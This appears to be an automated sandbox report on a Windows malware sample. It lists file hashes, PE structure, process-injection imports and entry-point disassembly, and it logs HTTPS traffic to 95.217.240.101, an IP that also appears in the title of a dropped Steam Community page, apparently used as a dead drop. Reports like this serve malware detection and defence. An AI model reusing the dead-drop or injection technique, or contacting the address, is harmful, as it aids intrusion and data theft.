                                                                              Entropy (8bit):6.872871740790978
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):608080
                                                                              Entropy (8bit):6.833616094889818
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):450024
                                                                              Entropy (8bit):6.673992339875127
                                                                              Encrypted:false
                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):34771
                                                                              Entropy (8bit):5.384707329935698
                                                                              Encrypted:false
                                                                              SSDEEP:768:Ddpqm+0Ih3YAA9CWGA2fcDAZPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2i:Dd8m+0Ih3YAA9CWGA2FZPzzgiJmDzJtZ
                                                                              MD5:E1272A5DEF427D3C572F30E33137E66F
                                                                              SHA1:2418DEAEC6C03B7E940B235F5B22DF985BA4E51C
                                                                              SHA-256:2E5105A3078B8C83EEA7F86251F0D56C93C6749A5C9ED44A23D06566E9550C24
                                                                              SHA-512:508997728F401092B15DA2FFD91A5275A3BEA4AC87E30ED5DD24811D1D2F6F76013F2E9B43FC898420BD326C7F86FC42DDA8BAFD7F4B3BA81C68A3FAC694B478
                                                                              Malicious:false
                                                                              Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r8p- https://95.217.240.101|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr
                                                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.559890664251954
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:372'224 bytes
                                                                              MD5:75db6dfdebb9bf0d98acfc15f2219c62
                                                                              SHA1:5bc1ceec4269b4e893f2b00c1c4b3c0cb42a3291
                                                                              SHA256:a2f94952c89ea440f82877365db5b4a5cf14a10e4168a22a92fce4a8fd98404f
                                                                              SHA512:b295c110369cb2c56d87aab45ff93961b076474d16ca9a7138ab3e6e7acbc8a13a2949dcbc88e6f2e96e4fae793e1793b3052c7ec390ee3d6cd517029583dd2f
                                                                              SSDEEP:6144:1JhLSp8zWMtAJA0Z9aRlEiw+pVc4Amr7me33k/JNSdiaJIlsZa6n:pLSpmqKRw+84B7mA3aJE4aOAFn
                                                                              TLSH:C384D050B0C08031D663253649E0EBB55E3EF9614F619E9F37A80EBF4F342D2DA61A5B
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.(./.{./.{./.{*].z./.{*].zS/.{*].z./.{*].z./.{./.{./.{;..z./.{;..z./.{;..z./.{...z./.{...z./.{Rich./.{........PE..L....fGf...
Icon Hash: 00928e8e8686b000
Entrypoint: 0x405cde
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66476698 [Fri May 17 14:15:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: e0b6966096a2c186c5f52fee6a381e0f
                                                                              Instruction
                                                                              call 00007F3884E7D9DBh
                                                                              jmp 00007F3884E7D0A9h
                                                                              mov ecx, dword ptr [ebp-0Ch]
                                                                              mov dword ptr fs:[00000000h], ecx
                                                                              pop ecx
                                                                              pop edi
                                                                              pop edi
                                                                              pop esi
                                                                              pop ebx
                                                                              mov esp, ebp
                                                                              pop ebp
                                                                              push ecx
                                                                              ret
                                                                              mov ecx, dword ptr [ebp-10h]
                                                                              xor ecx, ebp
                                                                              call 00007F3884E7CF95h
                                                                              jmp 00007F3884E7D212h
                                                                              push eax
                                                                              push dword ptr fs:[00000000h]
                                                                              lea eax, dword ptr [esp+0Ch]
                                                                              sub esp, dword ptr [esp+0Ch]
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [eax], ebp
                                                                              mov ebp, eax
                                                                              mov eax, dword ptr [0045A500h]
                                                                              xor eax, ebp
                                                                              push eax
                                                                              push dword ptr [ebp-04h]
                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                              mov dword ptr fs:[00000000h], eax
                                                                              ret
                                                                              push eax
                                                                              push dword ptr fs:[00000000h]
                                                                              lea eax, dword ptr [esp+0Ch]
                                                                              sub esp, dword ptr [esp+0Ch]
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [eax], ebp
                                                                              mov ebp, eax
                                                                              mov eax, dword ptr [0045A500h]
                                                                              xor eax, ebp
                                                                              push eax
                                                                              mov dword ptr [ebp-10h], eax
                                                                              push dword ptr [ebp-04h]
                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                              mov dword ptr fs:[00000000h], eax
                                                                              ret
                                                                              push eax
                                                                              push dword ptr fs:[00000000h]
                                                                              lea eax, dword ptr [esp+0Ch]
                                                                              sub esp, dword ptr [esp+0Ch]
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [eax], ebp
                                                                              mov ebp, eax
                                                                              mov eax, dword ptr [0045A500h]
                                                                              xor eax, ebp
                                                                              push eax
                                                                              mov dword ptr [ebp-10h], esp
                                                                              push dword ptr [ebp-04h]
                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                              mov dword ptr fs:[00000000h], eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26b54 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5d000 | 0x1a54 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x250e8 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x25028 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1e000 | 0x15c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1c59f | 0x1c600 | c974584c4e13e2149107eff417dd9cd3 | False | 0.5786756607929515 | data | 6.607233236723112 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1e000 | 0x933e | 0x9400 | f5b90bf6728e730f08e6ae3125e52278 | False | 0.39123205236486486 | data | 4.691228677009398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x28000 | 0x3433c | 0x33400 | c7f65d0fd90704e9d511f9e8abbc9eb8 | False | 0.9840463033536585 | data | 7.984832613465078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x5d000 | 0x1a54 | 0x1c00 | 898c036d1f57c251ff0d1554c59a02d7 | False | 0.7325613839285714 | data | 6.391338335451278 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | WaitForSingleObject, CreateRemoteThread, VirtualAlloc, FreeConsole, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EncodePointer, DecodePointer, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              May 17, 2024 18:06:09.388118982 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:10.165602922 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:10.165700912 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:10.165726900 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:10.165776968 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:10.166603088 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:10.166641951 CEST4434971095.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:10.166697025 CEST49710443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.003953934 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.003987074 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.004005909 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.004093885 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.004127026 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.004136086 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.004194975 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.040958881 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.041039944 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.041053057 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.041081905 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.041104078 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.041126966 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.064718962 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.064754009 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.064809084 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.064827919 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.064863920 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.067564964 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.078768969 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.078811884 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.078857899 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.078869104 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.078898907 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.078913927 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.120975018 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.121010065 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.121093035 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.121102095 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.121145964 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.192663908 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.192693949 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.192797899 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.192815065 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.192862034 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.247196913 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.247230053 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.247278929 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.247303009 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.247317076 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.247343063 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.313025951 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.313057899 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.313185930 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.313205004 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.313265085 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.381336927 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.381403923 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.381426096 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.381444931 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.381469965 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.381485939 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.408471107 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.408502102 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.408541918 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.408560038 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.408591986 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.408608913 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.427755117 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.427798033 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.427849054 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.427869081 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.427905083 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.427927017 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.464255095 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.464303017 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.464327097 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.464342117 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.464365005 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.464382887 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.482419968 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.482439995 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.482475996 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.482481003 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.482513905 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.509603024 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.509655952 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.509715080 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.509737015 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.509752035 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.509779930 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.544296026 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.544327021 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.544398069 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.544416904 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.544430017 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.544459105 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.566464901 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.566497087 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.566566944 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.566586018 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.566601038 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.566626072 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.585927010 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.585958004 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.586035967 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.586052895 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.586102962 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.608211994 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.608237028 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.608366966 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.608385086 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.608434916 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.623358965 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.623377085 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.623512030 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.623521090 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.623568058 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.636109114 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.636125088 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.636223078 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.636230946 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.636271000 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.653943062 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.653958082 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.654051065 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.654058933 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.654090881 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.664968014 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.664983034 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.665080070 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.665086031 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.665122986 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.674325943 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.674340010 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.674401045 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.674407959 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.674446106 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.689229965 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.689244986 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.689308882 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.689315081 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.689352989 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.701158047 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.701172113 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.701236010 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.701242924 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.701277971 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.713170052 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.713185072 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.713249922 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.713257074 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.713293076 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.721463919 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.721477032 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.721532106 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.721539021 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.721573114 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.732692957 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.732706070 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.732764006 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.732769966 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.732805014 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.741914988 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.741928101 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.741983891 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.741991043 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.742023945 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.757673979 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.757687092 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.757756948 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.757764101 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.757800102 CEST49712443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:11.763555050 CEST4434971295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:11.763571024 CEST4434971295.217.240.101192.168.2.5
